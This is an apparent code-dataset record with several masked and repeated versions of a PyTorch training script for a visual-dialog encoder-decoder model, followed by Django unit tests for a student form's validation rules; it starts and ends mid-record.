self._logger.info(self.previous_model_path)\n if (epoch < self.hparams.num_epochs - 1 and self.hparams.\n dataset_version == '0.9'):\n continue\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path,\n global_iteration_step, self.summary_writer, os.path.join(\n self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %\n epoch))\n torch.cuda.empty_cache()\n return self.previous_model_path\n",
"step-3": "<mask token>\n\n\nclass MVAN(object):\n\n def __init__(self, hparams):\n self.hparams = hparams\n self._logger = logging.getLogger(__name__)\n np.random.seed(hparams.random_seed[0])\n torch.manual_seed(hparams.random_seed[0])\n torch.cuda.manual_seed_all(hparams.random_seed[0])\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n self.device = torch.device('cuda', self.hparams.gpu_ids[0]\n ) if self.hparams.gpu_ids[0] >= 0 else torch.device('cpu')\n setproctitle(hparams.dataset_version + '_' + hparams.model_name +\n '_' + str(hparams.random_seed[0]))\n\n def _build_dataloader(self):\n old_split = 'train' if self.hparams.dataset_version == '0.9' else None\n self.train_dataset = VisDialDataset(self.hparams, overfit=self.\n hparams.overfit, split='train', old_split=old_split)\n collate_fn = None\n if 'dan' in self.hparams.img_feature_type:\n collate_fn = self.train_dataset.collate_fn\n self.train_dataloader = DataLoader(self.train_dataset, batch_size=\n self.hparams.train_batch_size, num_workers=self.hparams.\n cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # DATALOADER FINISHED\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _build_model(self):\n print('\\t* Building model...')\n encoder = Encoder(self.hparams, self.train_dataset.vocabulary)\n decoder = Decoder(self.hparams, self.train_dataset.vocabulary)\n print('Encoder: {}'.format(self.hparams.encoder))\n print('Decoder: {}'.format(self.hparams.decoder))\n if self.hparams.glove_npy != '':\n encoder.word_embed.weight.data = torch.from_numpy(np.load(self.\n hparams.glove_npy))\n print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)\n )\n decoder.word_embed = encoder.word_embed\n self.model = EncoderDecoderModel(encoder, decoder)\n self.model = self.model.to(self.device)\n if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:\n self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)\n if 'disc' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss()\n elif 'gen' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss(ignore_index=self.\n train_dataset.vocabulary.PAD_INDEX)\n if self.hparams.training_splits == 'trainval':\n self.iterations = (len(self.train_dataset) + len(self.\n valid_dataset)) // self.hparams.virtual_batch_size\n else:\n self.iterations = len(self.train_dataset\n ) // self.hparams.virtual_batch_size\n\n def lr_lambda_fun(current_iteration: int) ->float:\n \"\"\"Returns a learning rate multiplier.\n\n Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,\n and then gets multiplied by `lr_gamma` every time a milestone is crossed.\n \"\"\"\n current_epoch = float(current_iteration) / self.iterations\n if current_epoch <= self.hparams.warmup_epochs:\n alpha = current_epoch / float(self.hparams.warmup_epochs)\n return self.hparams.warmup_factor * (1.0 - alpha) + alpha\n else:\n return_val = 1.0\n if current_epoch >= self.hparams.lr_milestones[0\n ] and current_epoch < self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones, current_epoch)\n return_val = pow(self.hparams.lr_gamma, idx)\n elif current_epoch >= self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones2, current_epoch)\n return_val = self.hparams.lr_gamma * pow(self.hparams.\n lr_gamma2, idx)\n return return_val\n if self.hparams.lr_scheduler == 'LambdaLR':\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.\n hparams.initial_lr)\n self.scheduler = lr_scheduler.LambdaLR(self.optimizer,\n lr_lambda=lr_lambda_fun)\n else:\n raise NotImplementedError\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Build Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.\n hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(self.model, self.\n optimizer, self.save_dirpath, hparams=self.hparams)\n if self.hparams.load_pthpath == '':\n self.start_epoch = 1\n else:\n self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]\n [:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.\n hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print('Loaded model from {}'.format(self.hparams.load_pthpath))\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[\n 'ans_out']\n batch_loss = self.criterion(output.view(-1, output.size(-1)),\n target.view(-1).to(self.device))\n return batch_loss\n\n def train(self):\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n evaluation = Evaluation(self.hparams, model=self.model, split='val')\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n running_loss = 0.0\n train_begin = datetime.utcnow()\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n combined_dataloader = itertools.chain(self.train_dataloader)\n print(f'\\nTraining for epoch {epoch}:', 'Total Iter:', self.\n iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n accumulate_batch += batch['img_ids'].shape[0]\n if (self.hparams.virtual_batch_size == accumulate_batch or \n i == len(self.train_dataset) // self.hparams.\n train_batch_size):\n self.optimizer.step()\n if running_loss > 0.0:\n running_loss = (0.95 * running_loss + 0.05 *\n batch_loss.item())\n else:\n running_loss = batch_loss.item()\n self.optimizer.zero_grad()\n accumulate_batch = 0\n self.scheduler.step(global_iteration_step)\n global_iteration_step += 1\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.optimizer\n .param_groups[0]['lr']))\n tqdm_batch_iterator.set_description(description)\n if (global_iteration_step % self.hparams.\n tensorboard_step == 0):\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.\n optimizer.param_groups[0]['lr']))\n self._logger.info(description)\n self.summary_writer.add_scalar('train/loss',\n batch_loss, global_iteration_step)\n self.summary_writer.add_scalar('train/lr', self.\n optimizer.param_groups[0]['lr'],\n global_iteration_step)\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager\n .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)\n self._logger.info(self.previous_model_path)\n if (epoch < self.hparams.num_epochs - 1 and self.hparams.\n dataset_version == '0.9'):\n continue\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path,\n global_iteration_step, self.summary_writer, os.path.join(\n self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %\n epoch))\n torch.cuda.empty_cache()\n return self.previous_model_path\n",
"step-4": "<mask token>\nos.environ['CUDA_VISIBLE_DEVICES'] = '0,1'\n<mask token>\n\n\nclass MVAN(object):\n\n def __init__(self, hparams):\n self.hparams = hparams\n self._logger = logging.getLogger(__name__)\n np.random.seed(hparams.random_seed[0])\n torch.manual_seed(hparams.random_seed[0])\n torch.cuda.manual_seed_all(hparams.random_seed[0])\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n self.device = torch.device('cuda', self.hparams.gpu_ids[0]\n ) if self.hparams.gpu_ids[0] >= 0 else torch.device('cpu')\n setproctitle(hparams.dataset_version + '_' + hparams.model_name +\n '_' + str(hparams.random_seed[0]))\n\n def _build_dataloader(self):\n old_split = 'train' if self.hparams.dataset_version == '0.9' else None\n self.train_dataset = VisDialDataset(self.hparams, overfit=self.\n hparams.overfit, split='train', old_split=old_split)\n collate_fn = None\n if 'dan' in self.hparams.img_feature_type:\n collate_fn = self.train_dataset.collate_fn\n self.train_dataloader = DataLoader(self.train_dataset, batch_size=\n self.hparams.train_batch_size, num_workers=self.hparams.\n cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # DATALOADER FINISHED\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _build_model(self):\n print('\\t* Building model...')\n encoder = Encoder(self.hparams, self.train_dataset.vocabulary)\n decoder = Decoder(self.hparams, self.train_dataset.vocabulary)\n print('Encoder: {}'.format(self.hparams.encoder))\n print('Decoder: {}'.format(self.hparams.decoder))\n if self.hparams.glove_npy != '':\n encoder.word_embed.weight.data = torch.from_numpy(np.load(self.\n hparams.glove_npy))\n print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)\n )\n decoder.word_embed = encoder.word_embed\n self.model = EncoderDecoderModel(encoder, decoder)\n self.model = self.model.to(self.device)\n if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:\n self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)\n if 'disc' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss()\n elif 'gen' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss(ignore_index=self.\n train_dataset.vocabulary.PAD_INDEX)\n if self.hparams.training_splits == 'trainval':\n self.iterations = (len(self.train_dataset) + len(self.\n valid_dataset)) // self.hparams.virtual_batch_size\n else:\n self.iterations = len(self.train_dataset\n ) // self.hparams.virtual_batch_size\n\n def lr_lambda_fun(current_iteration: int) ->float:\n \"\"\"Returns a learning rate multiplier.\n\n Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,\n and then gets multiplied by `lr_gamma` every time a milestone is crossed.\n \"\"\"\n current_epoch = float(current_iteration) / self.iterations\n if current_epoch <= self.hparams.warmup_epochs:\n alpha = current_epoch / float(self.hparams.warmup_epochs)\n return self.hparams.warmup_factor * (1.0 - alpha) + alpha\n else:\n return_val = 1.0\n if current_epoch >= self.hparams.lr_milestones[0\n ] and current_epoch < self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones, current_epoch)\n return_val = pow(self.hparams.lr_gamma, idx)\n elif current_epoch >= self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones2, current_epoch)\n return_val = self.hparams.lr_gamma * pow(self.hparams.\n lr_gamma2, idx)\n return return_val\n if self.hparams.lr_scheduler == 'LambdaLR':\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.\n hparams.initial_lr)\n self.scheduler = lr_scheduler.LambdaLR(self.optimizer,\n lr_lambda=lr_lambda_fun)\n else:\n raise NotImplementedError\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Build Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.\n hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(self.model, self.\n optimizer, self.save_dirpath, hparams=self.hparams)\n if self.hparams.load_pthpath == '':\n self.start_epoch = 1\n else:\n self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]\n [:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.\n hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print('Loaded model from {}'.format(self.hparams.load_pthpath))\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[\n 'ans_out']\n batch_loss = self.criterion(output.view(-1, output.size(-1)),\n target.view(-1).to(self.device))\n return batch_loss\n\n def train(self):\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n evaluation = Evaluation(self.hparams, model=self.model, split='val')\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n running_loss = 0.0\n train_begin = datetime.utcnow()\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n combined_dataloader = itertools.chain(self.train_dataloader)\n print(f'\\nTraining for epoch {epoch}:', 'Total Iter:', self.\n iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n accumulate_batch += batch['img_ids'].shape[0]\n if (self.hparams.virtual_batch_size == accumulate_batch or \n i == len(self.train_dataset) // self.hparams.\n train_batch_size):\n self.optimizer.step()\n if running_loss > 0.0:\n running_loss = (0.95 * running_loss + 0.05 *\n batch_loss.item())\n else:\n running_loss = batch_loss.item()\n self.optimizer.zero_grad()\n accumulate_batch = 0\n self.scheduler.step(global_iteration_step)\n global_iteration_step += 1\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.optimizer\n .param_groups[0]['lr']))\n tqdm_batch_iterator.set_description(description)\n if (global_iteration_step % self.hparams.\n tensorboard_step == 0):\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.\n optimizer.param_groups[0]['lr']))\n self._logger.info(description)\n self.summary_writer.add_scalar('train/loss',\n batch_loss, global_iteration_step)\n self.summary_writer.add_scalar('train/lr', self.\n optimizer.param_groups[0]['lr'],\n global_iteration_step)\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager\n .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)\n self._logger.info(self.previous_model_path)\n if (epoch < self.hparams.num_epochs - 1 and self.hparams.\n dataset_version == '0.9'):\n continue\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path,\n global_iteration_step, self.summary_writer, os.path.join(\n self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %\n epoch))\n torch.cuda.empty_cache()\n return self.previous_model_path\n",
"step-5": "import os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1\"\nimport logging\nimport itertools\n\nimport torch\nfrom torch import nn, optim\nfrom torch.optim import lr_scheduler\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom tqdm import tqdm\nfrom setproctitle import setproctitle\nfrom bisect import bisect\n\nfrom datetime import datetime\nimport numpy as np\n\nfrom data.dataset import VisDialDataset\nfrom visdial.encoders import Encoder\nfrom visdial.decoders import Decoder\nfrom visdial.model import EncoderDecoderModel\nfrom visdial.utils.checkpointing import CheckpointManager, load_checkpoint\n\nfrom single_evaluation import Evaluation\n\nclass MVAN(object):\n def __init__(self, hparams):\n self.hparams = hparams\n self._logger = logging.getLogger(__name__)\n\n np.random.seed(hparams.random_seed[0])\n torch.manual_seed(hparams.random_seed[0])\n torch.cuda.manual_seed_all(hparams.random_seed[0])\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n\n self.device = (\n torch.device(\"cuda\", self.hparams.gpu_ids[0])\n if self.hparams.gpu_ids[0] >= 0\n else torch.device(\"cpu\")\n )\n setproctitle(hparams.dataset_version + '_' + hparams.model_name + '_' + str(hparams.random_seed[0]))\n\n # def _build_data_process(self):\n def _build_dataloader(self):\n # =============================================================================\n # SETUP DATASET, DATALOADER\n # =============================================================================\n old_split = \"train\" if self.hparams.dataset_version == \"0.9\" else None\n self.train_dataset = VisDialDataset(\n self.hparams,\n overfit=self.hparams.overfit,\n split=\"train\",\n old_split = old_split\n )\n\n collate_fn = None\n if \"dan\" in self.hparams.img_feature_type:\n collate_fn = self.train_dataset.collate_fn\n\n self.train_dataloader = DataLoader(\n self.train_dataset,\n batch_size=self.hparams.train_batch_size,\n num_workers=self.hparams.cpu_workers,\n shuffle=True,\n drop_last=True,\n collate_fn=collate_fn,\n )\n\n print(\"\"\"\n # -------------------------------------------------------------------------\n # DATALOADER FINISHED\n # -------------------------------------------------------------------------\n \"\"\")\n\n def _build_model(self):\n\n # =============================================================================\n # MODEL : Encoder, Decoder\n # =============================================================================\n\n print('\\t* Building model...')\n # Pass vocabulary to construct Embedding layer.\n encoder = Encoder(self.hparams, self.train_dataset.vocabulary)\n decoder = Decoder(self.hparams, self.train_dataset.vocabulary)\n\n print(\"Encoder: {}\".format(self.hparams.encoder))\n print(\"Decoder: {}\".format(self.hparams.decoder))\n\n # New: Initializing word_embed using GloVe\n if self.hparams.glove_npy != '':\n encoder.word_embed.weight.data = torch.from_numpy(np.load(self.hparams.glove_npy))\n print(\"Loaded glove vectors from {}\".format(self.hparams.glove_npy))\n # Share word embedding between encoder and decoder.\n decoder.word_embed = encoder.word_embed\n\n # Wrap encoder and decoder in a model.\n self.model = EncoderDecoderModel(encoder, decoder)\n self.model = self.model.to(self.device)\n # Use Multi-GPUs\n if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:\n self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)\n\n # =============================================================================\n # CRITERION\n # =============================================================================\n if \"disc\" in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss()\n\n elif \"gen\" in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss(ignore_index=self.train_dataset.vocabulary.PAD_INDEX)\n\n # Total Iterations -> for learning rate scheduler\n if self.hparams.training_splits == \"trainval\":\n self.iterations = (len(self.train_dataset) + len(self.valid_dataset)) // self.hparams.virtual_batch_size\n else:\n self.iterations = len(self.train_dataset) // self.hparams.virtual_batch_size\n\n # =============================================================================\n # OPTIMIZER, SCHEDULER\n # =============================================================================\n\n def lr_lambda_fun(current_iteration: int) -> float:\n \"\"\"Returns a learning rate multiplier.\n\n Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,\n and then gets multiplied by `lr_gamma` every time a milestone is crossed.\n \"\"\"\n current_epoch = float(current_iteration) / self.iterations\n if current_epoch <= self.hparams.warmup_epochs:\n alpha = current_epoch / float(self.hparams.warmup_epochs)\n return self.hparams.warmup_factor * (1.0 - alpha) + alpha\n else:\n return_val = 1.0\n if current_epoch >= self.hparams.lr_milestones[0] and current_epoch < self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones, current_epoch)\n return_val = pow(self.hparams.lr_gamma, idx)\n elif current_epoch >= self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones2, current_epoch)\n return_val = self.hparams.lr_gamma * pow(self.hparams.lr_gamma2, idx)\n return return_val\n\n if self.hparams.lr_scheduler == \"LambdaLR\":\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.hparams.initial_lr)\n self.scheduler = lr_scheduler.LambdaLR(self.optimizer, lr_lambda=lr_lambda_fun)\n else:\n raise NotImplementedError\n\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Build Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(\n self.model, self.optimizer, self.save_dirpath, hparams=self.hparams\n )\n\n # If loading from checkpoint, adjust start epoch and load parameters.\n if self.hparams.load_pthpath == \"\":\n self.start_epoch = 1\n else:\n # \"path/to/checkpoint_xx.pth\" -> xx\n self.start_epoch = int(self.hparams.load_pthpath.split(\"_\")[-1][:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print(\"Loaded model from {}\".format(self.hparams.load_pthpath))\n\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = (batch[\"ans_ind\"] if \"disc\" in self.hparams.decoder else batch[\"ans_out\"])\n batch_loss = self.criterion(output.view(-1, output.size(-1)), target.view(-1).to(self.device))\n\n return batch_loss\n\n def train(self):\n\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n\n # Evaluation Setup\n evaluation = Evaluation(self.hparams, model=self.model, split=\"val\")\n\n # Forever increasing counter to keep track of iterations (for tensorboard log).\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n\n running_loss = 0.0 # New\n train_begin = datetime.utcnow() # New\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n # -------------------------------------------------------------------------\n # ON EPOCH START (combine dataloaders if training on train + val)\n # -------------------------------------------------------------------------\n combined_dataloader = itertools.chain(self.train_dataloader)\n\n print(f\"\\nTraining for epoch {epoch}:\", \"Total Iter:\", self.iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0 # taesun New\n\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n\n accumulate_batch += batch[\"img_ids\"].shape[0]\n if self.hparams.virtual_batch_size == accumulate_batch \\\n or i == (len(self.train_dataset) // self.hparams.train_batch_size): # last batch\n\n self.optimizer.step()\n\n # --------------------------------------------------------------------\n # Update running loss and decay learning rates\n # --------------------------------------------------------------------\n if running_loss > 0.0:\n running_loss = 0.95 * running_loss + 0.05 * batch_loss.item()\n else:\n running_loss = batch_loss.item()\n\n self.optimizer.zero_grad()\n accumulate_batch = 0\n\n self.scheduler.step(global_iteration_step)\n\n global_iteration_step += 1\n # torch.cuda.empty_cache()\n description = \"[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]\".format(\n datetime.utcnow() - train_begin,\n epoch,\n global_iteration_step, running_loss,\n self.optimizer.param_groups[0]['lr'])\n tqdm_batch_iterator.set_description(description)\n\n # tensorboard\n if global_iteration_step % self.hparams.tensorboard_step == 0:\n description = \"[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]\".format(\n datetime.utcnow() - train_begin,\n epoch,\n global_iteration_step, running_loss,\n self.optimizer.param_groups[0]['lr'],\n )\n self._logger.info(description)\n # tensorboard writing scalar\n self.summary_writer.add_scalar(\n \"train/loss\", batch_loss, global_iteration_step\n )\n self.summary_writer.add_scalar(\n \"train/lr\", self.optimizer.param_groups[0][\"lr\"], global_iteration_step\n )\n\n # -------------------------------------------------------------------------\n # ON EPOCH END (checkpointing and validation)\n # -------------------------------------------------------------------------\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager.ckpt_dirpath, \"checkpoint_%d.pth\" % (epoch))\n self._logger.info(self.previous_model_path)\n\n if epoch < self.hparams.num_epochs - 1 and self.hparams.dataset_version == '0.9':\n continue\n\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path, global_iteration_step, self.summary_writer,\n os.path.join(self.checkpoint_manager.ckpt_dirpath, \"ranks_%d_valid.json\" % epoch))\n torch.cuda.empty_cache()\n\n return self.previous_model_path",
"step-ids": [
4,
6,
7,
8,
10
]
}
|
[
4,
6,
7,
8,
10
] |
from django.test import TestCase
from student.forms import StudentForm
class ModelTest(TestCase):
def test_expense_form_valid_data(self):
form = StudentForm(data={
'student_id': 500,
'firstName': "Emre",
'lastName': "Tan",
'department': "Panama",
'mathScore': 100,
'physicsScore': 70,
'chemistryScore': 40,
'biologyScore': 10
})
self.assertTrue(form.is_valid())
def test_expense_form_no_data(self):
form = StudentForm(data={})
self.assertFalse(form.is_valid())
self.assertEqual(len(form.errors), 8)
def test_expense_form_invalid_required(self):
form = StudentForm(data={
'student_id': 500,
'firstName': "",
'lastName': "",
'department': "",
'mathScore': 100,
'physicsScore': 70,
'chemistryScore': 40,
'biologyScore': 10
})
self.assertFalse(form.is_valid())
self.assertEqual(len(form.errors), 3)
self.assertEqual(form.errors, {
'firstName': ['This field is required.'],
'lastName': ['This field is required.'],
'department': ['This field is required.']
})
def test_expense_form_invalid_equal_to_max(self):
form = StudentForm(data={
'student_id': 120000,
'firstName': "Berkay",
'lastName': "Tan",
'department': "Bilisim",
'mathScore': 200,
'physicsScore': 150,
'chemistryScore': 150,
'biologyScore': 101
})
self.assertFalse(form.is_valid())
self.assertEqual(len(form.errors), 5)
self.assertEqual(form.errors, {
'student_id': ['Ensure this value is less than or equal to 9999.'],
'mathScore': ['Ensure this value is less than or equal to 100.'],
'physicsScore': ['Ensure this value is less than or equal to 100.'],
'chemistryScore': ['Ensure this value is less than or equal to 100.'],
'biologyScore': ['Ensure this value is less than or equal to 100.'],
})
|
normal
|
{
"blob_id": "6dc7c7de972388f3984a1238a2d62e53c60c622e",
"index": 6252,
"step-1": "<mask token>\n\n\nclass ModelTest(TestCase):\n\n def test_expense_form_valid_data(self):\n form = StudentForm(data={'student_id': 500, 'firstName': 'Emre',\n 'lastName': 'Tan', 'department': 'Panama', 'mathScore': 100,\n 'physicsScore': 70, 'chemistryScore': 40, 'biologyScore': 10})\n self.assertTrue(form.is_valid())\n <mask token>\n\n def test_expense_form_invalid_required(self):\n form = StudentForm(data={'student_id': 500, 'firstName': '',\n 'lastName': '', 'department': '', 'mathScore': 100,\n 'physicsScore': 70, 'chemistryScore': 40, 'biologyScore': 10})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 3)\n self.assertEqual(form.errors, {'firstName': [\n 'This field is required.'], 'lastName': [\n 'This field is required.'], 'department': [\n 'This field is required.']})\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ModelTest(TestCase):\n\n def test_expense_form_valid_data(self):\n form = StudentForm(data={'student_id': 500, 'firstName': 'Emre',\n 'lastName': 'Tan', 'department': 'Panama', 'mathScore': 100,\n 'physicsScore': 70, 'chemistryScore': 40, 'biologyScore': 10})\n self.assertTrue(form.is_valid())\n\n def test_expense_form_no_data(self):\n form = StudentForm(data={})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 8)\n\n def test_expense_form_invalid_required(self):\n form = StudentForm(data={'student_id': 500, 'firstName': '',\n 'lastName': '', 'department': '', 'mathScore': 100,\n 'physicsScore': 70, 'chemistryScore': 40, 'biologyScore': 10})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 3)\n self.assertEqual(form.errors, {'firstName': [\n 'This field is required.'], 'lastName': [\n 'This field is required.'], 'department': [\n 'This field is required.']})\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass ModelTest(TestCase):\n\n def test_expense_form_valid_data(self):\n form = StudentForm(data={'student_id': 500, 'firstName': 'Emre',\n 'lastName': 'Tan', 'department': 'Panama', 'mathScore': 100,\n 'physicsScore': 70, 'chemistryScore': 40, 'biologyScore': 10})\n self.assertTrue(form.is_valid())\n\n def test_expense_form_no_data(self):\n form = StudentForm(data={})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 8)\n\n def test_expense_form_invalid_required(self):\n form = StudentForm(data={'student_id': 500, 'firstName': '',\n 'lastName': '', 'department': '', 'mathScore': 100,\n 'physicsScore': 70, 'chemistryScore': 40, 'biologyScore': 10})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 3)\n self.assertEqual(form.errors, {'firstName': [\n 'This field is required.'], 'lastName': [\n 'This field is required.'], 'department': [\n 'This field is required.']})\n\n def test_expense_form_invalid_equal_to_max(self):\n form = StudentForm(data={'student_id': 120000, 'firstName':\n 'Berkay', 'lastName': 'Tan', 'department': 'Bilisim',\n 'mathScore': 200, 'physicsScore': 150, 'chemistryScore': 150,\n 'biologyScore': 101})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 5)\n self.assertEqual(form.errors, {'student_id': [\n 'Ensure this value is less than or equal to 9999.'],\n 'mathScore': ['Ensure this value is less than or equal to 100.'\n ], 'physicsScore': [\n 'Ensure this value is less than or equal to 100.'],\n 